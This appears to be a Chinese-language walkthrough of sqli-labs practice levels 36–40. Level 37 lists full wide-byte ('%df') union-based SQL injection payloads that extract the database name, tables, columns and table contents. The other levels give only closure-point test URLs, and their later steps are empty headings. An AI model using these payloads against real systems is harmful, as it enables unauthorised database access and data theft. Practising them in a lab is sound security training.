第36关
一.判断闭合点
http://127.0.0.1/Less-36/?id=1%df%20--+http://127.0.0.1/Less-36/?id=1%df%20--+
二.查询数据库
三.查表
四.查列
五.查user表里所有数据
第37关
一.进入brup抓包
进入重放器
二.查询数据库
uname=-1%df' union select database(),2#&passwd=1&submit=Submit
三.查表
uname=-1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit
四.查列
uname=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x656D61696C73#&passwd=1&submit=Submit
五.查user表里所有数据
uname=-1%df' union select 1,group_concat(id,0x3a,email_id) from emails#&passwd=1&submit=Submit
第38关
一.判断闭合点
http://172.16.1.41/Less-38/?id=1%27--+http://172.16.1.41/Less-38/?id=1%27--+
二.查询数据库
三.查表
四查列
五查user表里所有数据
第 39关
一.判断闭合点
http://172.16.1.41/Less-39/?id=1--+http://172.16.1.41/Less-39/?id=1--+
二.查询数据库
三.查表
四.查列
五.查user表中所有数据
第40关
一.判断闭合点
http://172.16.1.41/Less-40/?id=1%27)--+http://172.16.1.41/Less-40/?id=1%27)--+
二.查询数据库
三.查表
四.查列
五.查user表里所有数据